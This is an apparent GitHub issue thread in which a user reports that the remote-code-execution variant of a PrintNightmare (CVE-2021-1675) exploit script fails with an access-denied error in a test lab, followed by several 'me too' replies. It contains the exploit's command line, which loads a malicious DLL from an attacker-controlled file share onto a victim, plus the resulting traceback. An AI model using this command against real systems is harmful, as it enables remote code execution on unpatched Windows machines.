Open bananabr opened 3 years ago
Hi,
I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.
Domain Controller:
Victim domain member:
This is the result:
python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll' [*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL [*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll [*] Try 1... Traceback (most recent call last): File "CVE-2021-1675.py", line 188, in <module> main(dce, pDriverPath, options.share) File "CVE-2021-1675.py", line 93, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request raise exception impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Any help is appriciated.
me too
same here
same
Hi,
I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.
Domain Controller:
Victim domain member:
This is the result:
Any help is appriciated.